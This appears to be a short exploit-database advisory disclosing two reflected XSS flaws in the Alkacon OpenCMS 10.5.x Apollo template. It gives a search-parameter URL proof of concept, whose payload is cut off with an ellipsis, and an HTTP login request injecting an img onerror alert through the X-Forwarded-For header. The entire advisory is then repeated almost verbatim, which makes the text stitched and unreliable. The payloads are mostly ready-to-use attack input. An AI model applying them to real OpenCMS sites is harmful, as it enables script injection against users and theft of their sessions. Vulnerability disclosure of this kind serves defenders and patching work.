# Exploit Title: Alkacon OpenCMS 10.5.x - Multiple XSS in Apollo Template
# Google Dork: N/A
# Date: 18/07/2019
# Exploit Author: Aetsu
# Vendor Homepage: OpenCms, the Open Source Java Web Content Management System
# Software Link: https://github.com/alkacon/apollo-template
# Version: 10.5.x
# Tested on: 10.5.5 / 10.5.4
# CVE : CVE-2019-13234, CVE-2019-13235
1. Reflected XSS in the search engine:
- Affected resource -> "q"
POC:
```
https://example.com/apollo-demo/sea...noremax&reloaded&facet_query_query_ignoremax&
```
2. Reflected XSS in login form:
POC:
The vulnerability appears when the header X-Forwarded-For is used as shown
in the next request:
```
GET
/login/index.html?requestedResource=&name=Editor&password=editor&action=login
HTTP/1.1
Host: example.com
X-Forwarded-For: .<img src=. onerror=alert('XSS')>.test.ninja
```
Extended POCs: https://aetsu.github.io/OpenCms
# Google Dork: N/A
# Date: 18/07/2019
# Exploit Author: Aetsu
# Vendor Homepage: OpenCms, the Open Source Java Web Content Management System
# Software Link: https://github.com/alkacon/apollo-template
# Version: 10.5.x
# Tested on: 10.5.5 / 10.5.4
# CVE : CVE-2019-13234, CVE-2019-13235
1. Reflected XSS in the search engine:
- Affected resource -> "q"
POC:
```
https://example.com/apollo-demo/sea...noremax&reloaded&facet_query_query_ignoremax&
```
2. Reflected XSS in login form:
POC:
The vulnerability appears when the header X-Forwarded-For is used as shown
in the next request:
```
GET
/login/index.html?requestedResource=&name=Editor&password=editor&action=login
HTTP/1.1
Host: example.com
X-Forwarded-For: .<img src=. onerror=alert('XSS')>.test.ninja
```
Extended POCs: https://aetsu.github.io/OpenCms
